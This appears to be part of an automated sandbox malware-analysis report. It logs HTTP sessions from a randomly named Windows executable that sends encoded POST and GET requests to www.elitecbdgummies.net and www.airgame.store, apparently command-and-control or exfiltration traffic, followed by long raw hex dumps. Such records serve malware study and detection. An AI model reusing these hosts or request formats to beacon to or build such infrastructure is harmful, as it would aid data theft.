                                                    Data Ascii: <05hIbqIaX"F?Y|mi (QD+oW$4/b;h~6~Q,B,<vRu-YlV-("WHB1::R#uBWxcAaSbc1.RUe+"q1wO|W6/rQj)"_*[
                                                    Oct 10, 2024 10:01:38.039030075 CEST1236INData Raw: 81 5c 2e 54 a3 96 fe 53 f0 95 5d 16 05 b4 73 ca 47 7f 60 ad dc 99 d7 3e 6b 6c 83 98 d5 7f 89 b4 20 8a bb 9f 6b db 70 17 2d d3 92 63 e1 b3 f0 c4 fa 3f 36 74 c1 21 2d 14 aa f6 07 d4 51 2f a0 21 45 02 28 ba b6 53 ce 2e a2 46 00 61 4e fa 3f 62 59 97
                                                    Data Ascii: \.TS]sG`>kl kp-c?6t!-Q/!E(S.FaN?bY0|V{R2eK*+Z2^(pi&el#6mwg0"(|Yh"'1f,f.]Yk ^atT )R]TWpn&G9qGz~#r


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.649959172.96.186.20480524C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 10, 2024 10:01:39.749846935 CEST789OUTPOST /iaoq/ HTTP/1.1
                                                    Host: www.elitecbdgummies.net
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 233
                                                    Origin: http://www.elitecbdgummies.net
                                                    Referer: http://www.elitecbdgummies.net/iaoq/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 2d 58 72 38 3d 71 4a 65 58 37 49 37 49 6f 39 38 59 6b 4c 67 4f 56 6d 61 54 2f 39 34 68 6a 6a 4a 6a 45 46 35 64 66 5a 72 63 37 4f 30 2f 71 54 67 36 46 34 56 67 71 48 32 71 4f 45 4f 43 71 39 44 79 30 2f 4c 59 7a 58 55 49 47 33 47 36 33 72 62 42 5a 4d 48 63 68 4e 58 44 68 6c 49 67 78 39 41 46 36 65 67 59 6f 5a 50 31 63 38 4d 6c 51 6a 6c 35 30 2f 67 79 41 31 35 58 39 6f 53 78 4a 73 2f 69 77 43 4c 64 54 2f 6c 78 74 63 52 6e 54 2b 79 66 31 4a 74 44 56 66 41 5a 51 62 71 44 59 5a 73 51 54 30 76 57 67 4b 70 77 51 52 6a 58 79 64 46 78 77 4b 36 41 66 47 65 4c 34 36 75 4e 66 53 6e 70 50 54 4a 76 77 72 79 5a 50 77 65 48 41 4a 6b 75 51 78 4f 41 2b 55 58 79 69 5a 47 65 58 71 53 38 48 58 53 4d 54 41 3d 3d
                                                    Data Ascii: -Xr8=qJeX7I7Io98YkLgOVmaT/94hjjJjEF5dfZrc7O0/qTg6F4VgqH2qOEOCq9Dy0/LYzXUIG3G63rbBZMHchNXDhlIgx9AF6egYoZP1c8MlQjl50/gyA15X9oSxJs/iwCLdT/lxtcRnT+yf1JtDVfAZQbqDYZsQT0vWgKpwQRjXydFxwK6AfGeL46uNfSnpPTJvwryZPweHAJkuQxOA+UXyiZGeXqS8HXSMTA==
                                                    Oct 10, 2024 10:01:40.545531988 CEST1236INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    x-powered-by: PHP/7.4.33
                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    content-type: text/html; charset=UTF-8
                                                    link: <https://elitecbdgummies.net/wp-json/>; rel="https://api.w.org/"
                                                    x-litespeed-tag: 3eb_HTTP.404,3eb_PGSRP
                                                    x-litespeed-cache-control: no-cache
                                                    cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                    transfer-encoding: chunked
                                                    content-encoding: br
                                                    vary: Accept-Encoding
                                                    date: Thu, 10 Oct 2024 08:01:40 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 35 33 63 32 0d 0a f4 ff 1f 8a 48 56 6a 3d 14 51 55 eb e1 32 03 ae 66 f5 00 a8 5a 24 64 5e b0 fa e3 d7 9f 7f fe fb cb c0 d8 1d 10 cb 76 5c cf f7 9f bf d4 be eb 9f 2f ac 9d c1 52 22 04 76 ce e2 2a bd 8e dd 3b cd 5e 21 b3 23 c4 03 2b 15 12 2b 3d ec 78 28 97 4d ab f7 cc e7 d5 55 be 60 ee 5a 58 dd 0a 80 26 bc be 53 02 04 56 0d 69 25 70 d8 b0 98 aa ff b7 93 4f f8 63 fb 8f 15 53 1e 89 2d a7 ad f3 e6 0d 12 61 09 11 08 a8 20 29 47 59 fc 69 f5 df ec cf 57 ae 54 1f 33 7d 4b 69 61 30 93 b9 f6 8a 00 05 14 8c e4 95 e5 94 2b ff a7 69 59 0c 24 d1 1f f8 20 29 a3 70 14 c0 43 3c 30 ee 56 6b 66 64 ab d5 da 26 7d 9c 7c 1f c0 07 50 cd 42 15 5c 55 20 a5 e1 32 89 1d c4 1b 44 9b db 57 aa 95 32 99 b3 49 a2 24 50 7a 77 6f 7c 28 1b f9 ec 33 e9 a3 1e 13 00 bb 0c 00 ee 1b 60 c9 00 58 32 00 c9 0d 80 25 03 70 ef c6 00 03 ae f1 6f 78 ce f3 3d cf 5a ac 09 76 65 df da 58 a1 e2 bd 93 b1 2e 55 12 50 8a fe 7d aa f0 4b 41 a4 52 a4 ff 7f 6f 5a f1 8d 11 b0 94 01 ed e8 99 0d 09 2d ca 84 de 7b df 03 55 2a 01 c9 6e a0 6a 1b c8 f2 a4 a0 1e 7b [TRUNCATED]
                                                    Data Ascii: 53c2HVj=QU2fZ$d^v\/R"v*;^!#++=x(MU`ZX&SVi%pOcS-a )GYiWT3}Kia0+iY$ )pC<0Vkfd&}|PB\U 2DW2I$Pzwo|(3`X2%pox=ZveX.UP}KARoZ-{U*nj{&w$sr{SJ/!2%KjBb}-pC>rs>cdsG~~NmE;HmFDjUWa"/F2D1u{ ",^WOp-Y<iLW85qIvCQW.[@nf\STT<u!?$$CI>t@Ad_k"OgQ+r.-C4h7A<&kn76aDtFkqE|^=eWd?r?U,^X%\5.f_Au}o g,D}wT9IZ@n
                                                    Oct 10, 2024 10:01:40.545572042 CEST1236INData Raw: cc b1 a4 fd bf 61 de 02 34 39 a1 e3 a4 79 eb fb 1e 1c 46 82 88 2a 70 94 45 51 0b 70 a9 21 37 8b fc 24 c9 e5 b6 4a 4e f2 c5 40 fa 1f e3 7f 87 01 7a ff 68 6e 01 d1 b8 2e 26 32 99 48 ad 22 dc 05 4b 4a ae cc 5b e5 55 1e c5 41 f8 d0 55 df f9 09 55 b9
                                                    Data Ascii: a49yF*pEQp!7$JN@zhn.&2H"KJ[UAUUogU~yT9dw'qq;c@hdXeSN?g,7N<{R\"?Y,XHLL>k$_,M{#[8G9WKe]
                                                    Oct 10, 2024 10:01:40.545623064 CEST1236INData Raw: c4 75 94 71 0a d2 89 6a 75 db ef df a7 99 89 ed 56 2f 91 c2 b4 3e 56 82 b0 1b 06 a4 29 08 3c 3c cd 53 a4 fb 22 e3 48 7d d6 33 c6 66 c6 66 4a ad 8e 6f 14 de 78 3d f6 e0 90 71 33 64 29 b6 5d e4 27 c9 c3 c3 4d 72 92 2f 5e e4 b6 0d 6f 71 fe 36 23 1e
                                                    Data Ascii: uqjuV/>V)<<S"H}3ffJox=q3d)]'Mr/^oq6#-CatzClBc4+/5zCf~#YyoBg5<?xz-t7XVZ+eD@B ;qGuK{t8ps
                                                    Oct 10, 2024 10:01:40.545655012 CEST1236INData Raw: be fa b4 61 bf d8 e4 51 ac c7 3e c5 25 f4 c7 1e a1 e0 b4 b0 31 08 0f 0a 54 20 c4 52 80 67 54 b4 d9 f1 2e c5 4c 61 0b 15 6f 7f dc 5f e1 53 39 97 31 8b 6e db 7c 7f c5 30 85 47 f1 6b f4 9b 03 59 9a 30 fb fb 18 63 8a fd 6d b5 6b ff 04 48 99 5f 16 fa
                                                    Data Ascii: aQ>%1T RgT.Lao_S91n|0GkY0cmkH_^SxR=:'z@G'!V2%T|bc)kLZna^M`,"5 #uT"&sl [7M?xVl>$$QJw<h
                                                    Oct 10, 2024 10:01:40.545689106 CEST1236INData Raw: e1 c2 9d 53 8e 08 05 46 2d c4 17 c9 f9 fe 5c dc 61 04 cf aa ec 50 cc d2 16 ec 46 9d 21 c4 b5 0d be 94 df 46 4c 5d ae 53 46 fc 54 8b 7f 87 3a 90 67 48 cb 56 90 b2 c3 52 30 75 a8 43 11 b3 26 87 b3 76 b8 1a 40 dd 8e 64 70 54 03 2d a1 4f 26 3e d2 7e
                                                    Data Ascii: SF-\aPF!FL]SFT:gHVR0uC&v@dpT-O&>~weT&</}=[<Z4sm\a"U&+Tla=[r!dm'jy7]'4ILU*)U"`]<to#2
                                                    Oct 10, 2024 10:01:40.545722961 CEST1120INData Raw: 66 1b 8e d6 09 2b 9f 80 f5 23 c3 49 81 a1 a3 79 e4 82 19 b4 6a 5c 2b 70 6f 84 4a 21 87 3f fe e3 8f 7f dc 6c c3 d1 31 56 43 0d 1f 1d 35 c2 c9 ca a1 dc ea a3 e3 c2 05 83 21 34 96 03 3f 72 37 30 f5 8e ce f7 bb b0 8e d7 79 e6 61 c8 ac 1a 69 60 dd ea
                                                    Data Ascii: f+#Iyj\+poJ!?l1VC5!4?r70yai`9a>NyN\YB,pBBpWhK)":THu/~~4hfN<`u'4~hs2)%Jy%R|6<p h~/RE
                                                    Oct 10, 2024 10:01:40.545757055 CEST1236INData Raw: 2d 25 63 04 1f 6a 1d 76 14 ef c6 60 06 b5 0e 0d de 8d c4 01 04 27 5c d8 33 3f 80 d6 33 dc 90 b5 40 43 82 77 26 29 f1 8f 34 cf e8 b1 cb 60 9d 0a c2 8f 18 42 34 db ba 0c 1e cd 9a 0b f9 0a 5f 2b e5 b2 d9 86 eb db b7 cd 36 5c a9 f6 23 0a c8 b2 85 ae
                                                    Data Ascii: -%cjv`'\3?3@Cw&)4`B4_+6\#oO=xGlz|A`^*MVs?1JW|LpV%BcEXjqtr-gfhBbq$Jj6\C*{$5%T#u=\S|e7wMuX`5
                                                    Oct 10, 2024 10:01:40.545792103 CEST1236INData Raw: 7b 45 74 1f 34 a7 91 a1 c7 2d a8 37 2e 79 25 05 f4 da e3 ed c9 e2 a3 1d b4 31 08 c4 74 e6 9a f1 0b 6e e8 cf d1 88 cd 5d 07 53 b0 27 5c 19 9b 89 77 bd c9 d4 b9 a1 10 82 a9 f7 19 dd ab 10 90 23 51 3a d9 90 9c cf 18 db ee f5 79 e6 81 a3 03 99 d3 48
                                                    Data Ascii: {Et4-7.y%1tn]S'\w#Q:yHo:vOk0C#Zp>OmkM@T-Pgj[R|wE`h\3LJi KjpVjFDrqou7WIy`#9lpCF!P[SqQRiOt
                                                    Oct 10, 2024 10:01:40.545831919 CEST1236INData Raw: 3c 30 35 9a 13 dc c5 68 ff 07 a9 d1 9c 08 49 b0 62 1f 89 06 c3 71 0f 13 a1 49 b0 18 ef 14 df 61 c3 58 22 46 e3 cd 03 3f da 59 7c 6d 86 a6 69 08 20 08 af 9a 28 51 cf 44 2b c2 f3 e4 6f 57 06 df a4 af 0c c0 24 ae 34 2f 1a 0d dc 8c 62 3b 09 be 68 eb
                                                    Data Ascii: <05hIbqIaX"F?Y|mi (QD+oW$4/b;h~6~Q,B,<vRu-YlV-("WHB1::R#uBWxcAaSbc1.RUe+"q1wO|W6/rQj)"_*[
                                                    Oct 10, 2024 10:01:40.545866966 CEST1236INData Raw: 81 5c 2e 54 a3 96 fe 53 f0 95 5d 16 05 b4 73 ca 47 7f 60 ad dc 99 d7 3e 6b 6c 83 98 d5 7f 89 b4 20 8a bb 9f 6b db 70 17 2d d3 92 63 e1 b3 f0 c4 fa 3f 36 74 c1 21 2d 14 aa f6 07 d4 51 2f a0 21 45 02 28 ba b6 53 ce 2e a2 46 00 61 4e fa 3f 62 59 97
                                                    Data Ascii: \.TS]sG`>kl kp-c?6t!-Q/!E(S.FaN?bY0|V{R2eK*+Z2^(pi&el#6mwg0"(|Yh"'1f,f.]Yk ^atT )R]TWpn&G9qGz~#r
                                                    Oct 10, 2024 10:01:40.550764084 CEST1236INData Raw: fc f1 ef 7f 3c 0e 52 63 6d 63 9e f0 3c 4e 56 71 65 f4 30 50 cd 9e 75 ab d9 fe 89 bd d0 c5 b2 94 a5 8c b3 8c bf 65 fc f4 df 6f b7 e2 67 b2 bb c0 b4 21 98 76 5d 9f 11 b9 8a f4 9e bf a5 f7 ef 64 2e fe be 26 0e 83 24 e6 f4 d8 32 d2 57 c4 be c4 2a 79
                                                    Data Ascii: <Rcmc<NVqe0Pueog!v]d.&$2W*yKW+d!_44 0+"c.PUQd u&QV86WliSwn}L|L9BJPb3(0(J=BF!A{o


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.649960172.96.186.20480524C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 10, 2024 10:01:42.679589033 CEST1802OUTPOST /iaoq/ HTTP/1.1
                                                    Host: www.elitecbdgummies.net
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Origin: http://www.elitecbdgummies.net
                                                    Referer: http://www.elitecbdgummies.net/iaoq/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
                                                    Data Raw: 2d 58 72 38 3d 71 4a 65 58 37 49 37 49 6f 39 38 59 6b 4c 67 4f 56 6d 61 54 2f 39 34 68 6a 6a 4a 6a 45 46 35 64 66 5a 72 63 37 4f 30 2f 71 54 6f 36 46 4e 5a 67 6c 48 4b 71 4e 45 4f 43 30 4e 44 7a 30 2f 4c 52 7a 58 4d 45 47 33 36 41 33 75 48 42 59 76 66 63 32 49 37 44 71 6c 49 67 2f 74 42 43 33 2b 67 4e 6f 5a 66 78 63 38 38 6c 51 6a 6c 35 30 39 34 79 44 67 5a 58 75 34 53 79 4f 73 2f 6d 37 69 4b 54 54 2f 74 4c 74 63 56 33 53 4e 36 66 31 70 39 44 61 4e 34 5a 63 62 71 42 62 5a 73 32 54 30 7a 5a 67 4c 46 38 51 52 57 43 79 64 68 78 79 66 6d 44 48 48 32 4b 71 39 47 33 50 7a 54 32 4d 54 52 42 70 4b 57 65 66 42 50 33 4f 61 51 7a 58 32 4c 64 33 57 61 72 6a 59 47 68 63 75 71 75 52 6a 50 6b 50 4d 2b 57 73 44 61 45 67 70 42 4b 76 32 50 46 77 2f 43 73 71 37 70 70 61 47 4c 52 2f 64 35 74 32 41 4e 4f 6d 38 37 4b 62 79 67 30 4c 6f 6f 4b 6e 65 67 45 71 38 4b 39 57 73 34 49 73 58 6c 48 4e 39 49 78 66 43 54 70 4f 61 6f 6c 53 72 6a 6d 63 34 34 4b 30 55 75 6c 44 2f 4a 76 34 33 70 43 6f 72 36 52 34 4b 51 2b 51 42 2f 71 6f [TRUNCATED]
                                                    Data Ascii: -Xr8=qJeX7I7Io98YkLgOVmaT/94hjjJjEF5dfZrc7O0/qTo6FNZglHKqNEOC0NDz0/LRzXMEG36A3uHBYvfc2I7DqlIg/tBC3+gNoZfxc88lQjl5094yDgZXu4SyOs/m7iKTT/tLtcV3SN6f1p9DaN4ZcbqBbZs2T0zZgLF8QRWCydhxyfmDHH2Kq9G3PzT2MTRBpKWefBP3OaQzX2Ld3WarjYGhcuquRjPkPM+WsDaEgpBKv2PFw/Csq7ppaGLR/d5t2ANOm87Kbyg0LooKnegEq8K9Ws4IsXlHN9IxfCTpOaolSrjmc44K0UulD/Jv43pCor6R4KQ+QB/qo1wZmNC02DnIPsq7GQVvUk96SfT6cb671o0W4HCt5EWQp3QjCLl9RpZmUfJYUvrC0RwMD3/Tc+Akt9nttgjuNCT1/8Y94Y4Yr/3tLs/smTi5zkvZzH5XUVET2FpqGWb7iPycCnz3A+P7hFx+hck+Xn7JGLSK7mL+QqgylX8IpphXpPqM9UT+HDenorqMQy6GHYAegg0Hu2K+SH+IgC60h5Pjr1lXq215NMNcE6rHt+zbHVZqPe3hWe0SuZsPc/sb1XyGGZtL868ubvlxvtk/QKMRBXtSCUE69gQFA1Hmi3YkfXCbcKll/vDDuNHDL3AUWX5GnZIk4pV2dgV8S37mGXxdrMrxEK+K2cR32NWiuSx26mfIKWGdq/ErJJhZvdSoPOUpwp7xJU69VRbcd8tJbHiljJJb5K88HZgPjApHsnZ/RDUu2bimgVMKYZtounckOCji7wul9MJ9LpAi/ofU6VzsKCz1PSdrASyjVPlkCwtbEBw9T+X5yA+Sy+kIYKQWoyFNIH587knS9Iyw969RVr3/ljJ88tGjUIVrG3vtVoaeW7PKlOS7RI8+FIZVluvHqaC410hpHXrI4IUkD5MVzMw1nj65f/aNrJ5DZxEr+FmstnHqjbMXSblOb0CzETYlwegCOh9iGKehyFOZYdwPFlm9wFpdjWfP4Ie [TRUNCATED]
                                                    Oct 10, 2024 10:01:43.452442884 CEST1236INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    x-powered-by: PHP/7.4.33
                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    content-type: text/html; charset=UTF-8
                                                    link: <https://elitecbdgummies.net/wp-json/>; rel="https://api.w.org/"
                                                    x-litespeed-tag: 3eb_HTTP.404,3eb_PGSRP
                                                    x-litespeed-cache-control: no-cache
                                                    cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                    transfer-encoding: chunked
                                                    content-encoding: br
                                                    vary: Accept-Encoding
                                                    date: Thu, 10 Oct 2024 08:01:43 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 35 33 63 32 0d 0a f4 ff 1f 8a 48 56 6a 3d 14 51 55 eb e1 32 03 ae 66 f5 00 a8 5a 24 64 5e b0 fa e3 d7 9f 7f fe fb cb c0 d8 1d 10 cb 76 5c cf f7 9f bf d4 be eb 9f 2f ac 9d c1 52 22 04 76 ce e2 2a bd 8e dd 3b cd 5e 21 b3 23 c4 03 2b 15 12 2b 3d ec 78 28 97 4d ab f7 cc e7 d5 55 be 60 ee 5a 58 dd 0a 80 26 bc be 53 02 04 56 0d 69 25 70 d8 b0 98 aa ff b7 93 4f f8 63 fb 8f 15 53 1e 89 2d a7 ad f3 e6 0d 12 61 09 11 08 a8 20 29 47 59 fc 69 f5 df ec cf 57 ae 54 1f 33 7d 4b 69 61 30 93 b9 f6 8a 00 05 14 8c e4 95 e5 94 2b ff a7 69 59 0c 24 d1 1f f8 20 29 a3 70 14 c0 43 3c 30 ee 56 6b 66 64 ab d5 da 26 7d 9c 7c 1f c0 07 50 cd 42 15 5c 55 20 a5 e1 32 89 1d c4 1b 44 9b db 57 aa 95 32 99 b3 49 a2 24 50 7a 77 6f 7c 28 1b f9 ec 33 e9 a3 1e 13 00 bb 0c 00 ee 1b 60 c9 00 58 32 00 c9 0d 80 25 03 70 ef c6 00 03 ae f1 6f 78 ce f3 3d cf 5a ac 09 76 65 df da 58 a1 e2 bd 93 b1 2e 55 12 50 8a fe 7d aa f0 4b 41 a4 52 a4 ff 7f 6f 5a f1 8d 11 b0 94 01 ed e8 99 0d 09 2d ca 84 de 7b df 03 55 2a 01 c9 6e a0 6a 1b c8 f2 a4 a0 1e 7b [TRUNCATED]
                                                    Data Ascii: 53c2HVj=QU2fZ$d^v\/R"v*;^!#++=x(MU`ZX&SVi%pOcS-a )GYiWT3}Kia0+iY$ )pC<0Vkfd&}|PB\U 2DW2I$Pzwo|(3`X2%pox=ZveX.UP}KARoZ-{U*nj{&w$sr{SJ/!2%KjBb}-pC>rs>cdsG~~NmE;HmFDjUWa"/F2D1u{ ",^WOp-Y<iLW85qIvCQW.[@nf\STT<u!?$$CI>t@Ad_k"OgQ+r.-C4h7A<&kn76aDtFkqE|^=eWd?r?U,^X%\5.f_Au}o g,D}wT9IZ@n
                                                    Oct 10, 2024 10:01:43.452483892 CEST224INData Raw: cc b1 a4 fd bf 61 de 02 34 39 a1 e3 a4 79 eb fb 1e 1c 46 82 88 2a 70 94 45 51 0b 70 a9 21 37 8b fc 24 c9 e5 b6 4a 4e f2 c5 40 fa 1f e3 7f 87 01 7a ff 68 6e 01 d1 b8 2e 26 32 99 48 ad 22 dc 05 4b 4a ae cc 5b e5 55 1e c5 41 f8 d0 55 df f9 09 55 b9
                                                    Data Ascii: a49yF*pEQp!7$JN@zhn.&2H"KJ[UAUUogU~yT9dw'qq;c@hdXeSN?g,7N<{R\"?Y,XHLL>k$_,M{#[8
                                                    Oct 10, 2024 10:01:43.452507973 CEST1236INData Raw: 14 d8 84 e1 e8 9e 47 39 b5 be b8 c6 57 88 18 4b e0 65 5d a6 2c 51 ae 65 a2 b3 be 5f 85 5f 5b ca e6 6d 84 18 8d 77 b7 e8 83 ea 40 44 c0 cf 08 3d f5 fc cb ed af bf 88 88 c1 b8 ce b4 47 8a 8c cd 45 47 7e 9a 67 12 ce 75 a0 c0 91 3b 36 81 68 43 fb 5e
                                                    Data Ascii: G9WKe],Qe__[mw@D=GEG~gu;6hC^iB+WQ6ti^15~'^m$H;8$wuHAt{;)(TIz{Npha8Kw)$ 03&mo`P(I#egQ3]MUcE[hqsx]r.
                                                    Oct 10, 2024 10:01:43.452519894 CEST1236INData Raw: 74 38 70 af 8d ac e3 f5 e5 a5 9b 1c db 73 b0 ac ce c7 fc 10 f9 ea fb f5 ee 05 55 b5 6f cb 01 85 39 30 d8 09 52 47 f6 9f da 38 6a 07 12 64 29 2b 2f c2 d7 ea b7 03 42 96 70 24 3f 67 26 a7 8c fe 74 c9 34 20 63 c4 bc 3e 16 59 4c 7e 24 dd 37 d1 4e 6b
                                                    Data Ascii: t8psUo90RG8jd)+/Bp$?g&t4 c>YL~$7Nk-&Bst9_0G"pTva8#!qLm_h9.T*">5MtN2uo{xO@t~UQJz$6aCy`S{yFFJ'
                                                    Oct 10, 2024 10:01:43.452532053 CEST1236INData Raw: 10 0a 13 0f 24 f8 97 51 d8 bd 19 4a 08 77 3c d2 68 18 19 3c 5a 73 44 f1 88 b7 a0 35 4d 19 6d f2 1a b1 0a d8 f2 f0 31 f1 a0 da f8 b8 77 07 b0 ed a4 07 a1 b5 31 0e 1d 06 91 19 18 8d df 6a a1 0b 83 46 92 0a 52 1b 57 22 62 82 80 d1 e4 43 29 68 51 c8
                                                    Data Ascii: $QJw<h<ZsD5Mm1w1jFRW"bC)hQhGd7"25eP_V$HPG$<Dt5-$z"fI.ts5)SQJn1-|.aMh>f"W3R($$qN5qjLQjNrj1xQz~
                                                    Oct 10, 2024 10:01:43.452543020 CEST1236INData Raw: 87 b0 d3 3c eb 8b fe ba 80 82 f9 74 6f 23 c6 32 81 d2 8f e4 49 ad f7 a4 96 42 7e 97 15 ce 1c f3 66 1b 02 76 31 16 d2 21 08 a6 91 34 6b 0a 61 9d db 44 c5 f6 d3 03 52 46 87 c6 29 67 6e f9 50 c0 41 d8 72 09 e4 bd 01 39 9d 22 c2 83 e3 fd ce c5 47 9c
                                                    Data Ascii: <to#2IB~fv1!4kaDRF)gnPAr9"Gxnv5=[P%mj1&fzhzNq7p2c-d:5GBX=,(/,Bg^DQ|rbf+|Y,h&A8EF#0"FzhL^pL38
                                                    Oct 10, 2024 10:01:43.452559948 CEST1236INData Raw: cd 36 3c b7 70 20 11 68 7e 82 2f 16 52 a4 45 dd d0 aa b7 6d b5 13 aa ce 94 08 9a 70 6f 64 48 89 56 d0 73 ca c1 49 fb 11 02 2a 64 91 16 09 0e 05 4d 03 c1 2b 26 33 1a ff 80 8f 3d d0 53 47 3e 48 ba 4c c7 9e e7 f4 04 55 67 db 6c c3 b3 f6 a6 d9 64 21
                                                    Data Ascii: 6<p h~/REmpodHVsI*dM+&3=SG>HLUgld!{loJ(BNZj9pt[MumxL%+eZ250`%f^8dnQy~"*b"+\,{4Vg/&/V:16<M:md
                                                    Oct 10, 2024 10:01:43.452573061 CEST1236INData Raw: 4d d8 99 88 5c 13 0f 3a 5a 13 c7 3d 52 05 01 f8 4b 26 96 3d f7 12 74 52 9a 51 81 67 b0 02 a5 44 38 3f ab 2a 48 09 d5 74 1b 15 5c 7f 92 6a ca 36 ee e0 10 8d 65 0a 0a 4a dd c4 c3 38 15 82 f6 81 0a cc e0 b0 b3 bc 65 e8 cf da 02 e7 07 fa 2b 38 98 04
                                                    Data Ascii: M\:Z=RK&=tRQgD8?*Ht\j6eJ8e+8LP!-tzF^&HBS 8R$tamE|n44*[pzU}UCUHPO)Z$dJAokM%l\I$N}4U`(%Rh"[1Hjj*%
                                                    Oct 10, 2024 10:01:43.452585936 CEST1236INData Raw: 0d b4 40 b7 ae 6e b1 82 64 cd 34 35 2b 4c 11 75 db 8c b5 a2 b6 b1 db bf a2 1e 82 4c 20 0c 1a ee 1a d2 35 f4 07 57 12 a6 51 b6 ff 4a 61 12 65 0b d3 60 0b e6 2c 37 40 46 3c b8 b5 d4 00 5c 9f 59 6b c3 be 1b 08 21 4a 2e a2 dd 8c 0d 50 e7 9a ac dc 09
                                                    Data Ascii: @nd45+LuL 5WQJae`,7@F<\Yk!J.P~o0u@9ipC9,]7`at`FL`LaIPdgWopkW$G;99 6=`K[I?uX&FxyB$`!:$K2RdPt'?gt
                                                    Oct 10, 2024 10:01:43.452599049 CEST1000INData Raw: 01 db 89 a2 25 c0 45 66 4d ad e0 9b 47 68 45 19 05 70 2e 96 3c 59 aa 88 93 56 ca 0f da c0 27 34 27 78 1e d0 34 26 6f 91 96 81 98 ec 30 0e 21 34 d5 8c a6 1e 7a fc 24 1b 91 eb 54 51 97 4b ab 89 d0 18 a1 1f 13 69 69 9a 8b 03 78 bc 3a 6a 27 e4 c5 c5
                                                    Data Ascii: %EfMGhEp.<YV'4'x4&o0!4z$TQKiix:j'B$D("*svC&4$@c!|*<P-/I)G^{%5nPU-m4h@*dC{/ 57Z%%u8N<k18
                                                    Oct 10, 2024 10:01:43.457498074 CEST1236INData Raw: a0 94 1b 2b 10 5a 32 c9 5e f0 d2 28 14 c2 70 b9 69 ea ca 26 65 1a ad 10 6c f5 23 36 13 0a f2 6d 89 77 67 30 8c 22 28 8b d8 d1 7c 9c c9 f9 bb 59 90 a9 68 a8 22 e3 27 31 cb 09 7f 66 f8 bb b4 2c 16 ed b5 dc e7 97 06 66 2e 5d 96 bc 59 ae 0b c5 80 1a
                                                    Data Ascii: +Z2^(pi&el#6mwg0"(|Yh"'1f,f.]Yk ^atT )R]TWpn&G9qGz~#r aXGD?qK!](4@TvC]'_WT#QYr^u{LqOPEnKpB809'RI~Z0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.649962172.96.186.20480524C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 10, 2024 10:01:45.339699030 CEST494OUTGET /iaoq/?-Xr8=nL2348Pfr+NFoI01B13i6ooM2GhLPn5db8T/pNEZx3omavlXh0CLNHmy0NPG1pf7zjIobHCC6tPoB9SY98rXt0wu24FP/Owek6nccbtLOiVilNhWN1FN3veqOsXp1hjRF8Z6s4A=&mBsxM=YJ0LnZ68 HTTP/1.1
                                                    Host: www.elitecbdgummies.net
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.649963188.114.96.380524C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 10, 2024 10:01:50.547074080 CEST747OUTPOST /ojib/ HTTP/1.1
                                                    Host: www.airgame.store
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Origin: http://www.airgame.store
                                                    Referer: http://www.airgame.store/ojib/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
